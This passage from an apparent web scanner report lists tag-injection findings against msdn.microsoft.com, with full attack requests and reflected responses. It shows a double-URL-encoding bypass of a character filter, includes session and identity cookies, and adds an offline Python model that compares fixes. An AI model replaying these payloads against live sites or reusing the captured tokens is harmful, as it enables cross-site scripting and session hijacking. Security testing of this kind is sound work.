Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc0137"><a>0e5c27062dd/dd582938(v/x3doffice.11" />
...[SNIP]...

2.60. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v/x3doffice.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68427%2522%253e%253ca%253ef797850a81e was submitted in the REST URL parameter 3. This input was echoed as 68427"><a>f797850a81e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(v68427%2522%253e%253ca%253ef797850a81e/x3doffice.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v68427"><a>f797850a81e/x3doffice.11" />
...[SNIP]...

2.61. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v/x3doffice.11

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fe24%2522%253e%253ca%253edee8348ee07 was submitted in the REST URL parameter 4. This input was echoed as 5fe24"><a>dee8348ee07 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(v/x3doffice.115fe24%2522%253e%253ca%253edee8348ee07 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v/x3doffice.115fe24"><a>dee8348ee07" />
...[SNIP]...

2.62. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v/x3doffice.11

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92bbc"><a>62955b61670 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us/library/dd582938(v/x3doffice.11?92bbc"><a>62955b61670=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10038
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms123402(l=MSDN.10).aspx?missingurl=/en-us/library/dd582938(v/x3doffice.11&92bbc"><a>62955b61670=1" />
...[SNIP]...
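
All of the msdn.microsoft.com findings above share one sink: the requested URL is carried through a redirect into a query parameter of an error page (aspxerrorpath, or missingurl in 2.62) and written, without encoding, into the double-quoted value attribute of the hidden fromPage input. For the REST URL segments the payload had to be double URL-encoded to get past a filter on the path; for the parameter name in 2.62 the raw payload was echoed unmodified. The Python below is an added example, not code from this report or from msdn.microsoft.com. It models that two-hop chain so the double-decode bypass, the report's remediation (decode once) and the attribute-encoding fix can be compared offline. The model itself is an assumption that fits the captured requests and responses but is not verified behaviour of the real server: hop 1 URL-decodes the path once, rejects raw <, > and " in it, and pastes the decoded path and the untouched query string into the redirect target; hop 2 parses that query string (a second decode of the path) and emits the result into the attribute. ERROR_PAGE, PATH_BLOCKLIST, the hop1_redirect/hop2_error_page/run_chain/demo functions and the attribute_breakout check are all constructed here; the paths and marker strings are the ones captured in findings 2.56 and 2.62.

```python
"""Constructed model of the reflection chain in findings 2.55 to 2.63: an added
example, not code from the report or from msdn.microsoft.com. Assumptions,
consistent with the captured traffic but not verified against the real server:
hop 1 URL-decodes the request path once, rejects raw <, > and " in it, and
redirects unknown paths to an error page, carrying the decoded path and the
original query string; hop 2 parses that query string (which URL-decodes the
path a second time) and writes the resulting URL into the double-quoted
value="..." attribute of the hidden fromPage input."""
from html import escape
from urllib.parse import parse_qsl, quote, unquote, urlencode

ERROR_PAGE = "http://msdn.microsoft.com/en-us/Message-Error.htm.htm"  # from the report
HIDDEN_INPUT = '<input type="hidden" name="fromPage" value="{}" />'
PATH_BLOCKLIST = set('<>"')  # assumed filter applied to the once-decoded path


def hop1_redirect(raw_path, raw_query="", reencode=False):
    """Front end. Returns the redirect target, or None when the path filter
    rejects the request. With reencode=False (the modelled bug) the once-decoded
    path is pasted into the query string verbatim, so any %xx left in it is
    decoded again by whoever parses that query string."""
    decoded_once = unquote(raw_path)
    if PATH_BLOCKLIST & set(decoded_once):
        return None  # single-encoded %22%3e%3ca%3e decodes to "><a> and is blocked
    if reencode:
        path_value = quote(decoded_once, safe="/()")  # one decode end to end
        extra = urlencode(parse_qsl(raw_query, keep_blank_values=True))
    else:
        path_value = decoded_once
        extra = raw_query  # original query string appended unchanged (finding 2.62)
    location = f"{ERROR_PAGE}?aspxerrorpath={path_value}"
    return location + ("&" + extra if extra else "")


def hop2_error_page(location, encode_output=False):
    """Error page: rebuilds its own URL from the parsed (URL-decoded) query
    string and writes it into the hidden input. Without attribute encoding a
    decoded " closes value="..." and the following ><a> opens a new tag."""
    _, _, query = location.partition("?")
    pairs = parse_qsl(query, keep_blank_values=True)
    from_page = ERROR_PAGE + "?" + "&".join(f"{k}={v}" for k, v in pairs)
    if encode_output:
        from_page = escape(from_page, quote=True)  # " -> &quot;  < -> &lt;  > -> &gt;
    return HIDDEN_INPUT.format(from_page)


def attribute_breakout(html, prefix, suffix):
    """The scanner's own criterion: the two markers echoed around a literal
    "><a> mean the payload left the attribute and injected a tag."""
    return f'{prefix}"><a>{suffix}' in html


def run_chain(raw_path, raw_query="", reencode=False, encode_output=False):
    """Request -> redirect -> error page HTML; None if hop 1 blocks the request."""
    location = hop1_redirect(raw_path, raw_query, reencode)
    return None if location is None else hop2_error_page(location, encode_output)


def demo():
    """Replay finding 2.56 (double-encoded REST segment 2) and finding 2.62 (raw
    payload in a parameter name) against the vulnerable chain and each fix.
    Paths and marker strings are the ones captured in the report."""
    rest = "/en-us/librarya58b3{}a478026753a/dd582938(office.11).aspx"
    single, double = rest.format("%22%3e%3ca%3e"), rest.format("%2522%253e%253ca%253e")
    page, qname = "/en-us/library/dd582938(v/x3doffice.11", '92bbc"><a>62955b61670=1'

    def rest_hit(html):
        return attribute_breakout(html, "a58b3", "a478026753a")

    def qname_hit(html):
        return attribute_breakout(html, "92bbc", "62955b61670")

    return {
        "rest_single_encoded_blocked_by_filter": run_chain(single) is None,
        "rest_double_encoded_breakout": rest_hit(run_chain(double)),
        "rest_breakout_after_single_decode_fix": rest_hit(run_chain(double, reencode=True)),
        "rest_breakout_after_output_encoding": rest_hit(run_chain(double, encode_output=True)),
        "qname_breakout": qname_hit(run_chain(page, qname)),
        "qname_breakout_after_single_decode_fix": qname_hit(run_chain(page, qname, reencode=True)),
        "qname_breakout_after_output_encoding": qname_hit(run_chain(page, qname, encode_output=True)),
    }
```

demo() separates two things the repeated issue text above does not: re-encoding the path before it is placed in the redirect query string (a single decode end to end, which is the report's remediation) closes the REST-segment variant, but the parameter-name variant of 2.62 never depended on a second decode and is closed only by HTML-attribute-encoding the value at output time, which also closes the REST variant on its own. Attribute encoding at the sink is therefore the fix to insist on; removing the extra decode is defence in depth that also restores the meaning of the path filter.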

2.63. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6483a%2522%253e%253ca%253e8800823c465 was submitted in the REST URL parameter 1. This input was echoed as 6483a"><a>8800823c465 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us6483a%2522%253e%253ca%253e8800823c465/library/dd582938(v=office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us6483a"><a>8800823c465/library/dd582938(v=office.11" />
...[SNIP]...

2.64. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d55f6%2522%253e%253ca%253efdd48321b4d was submitted in the REST URL parameter 2. This input was echoed as d55f6"><a>fdd48321b4d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryd55f6%2522%253e%253ca%253efdd48321b4d/dd582938(v=office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

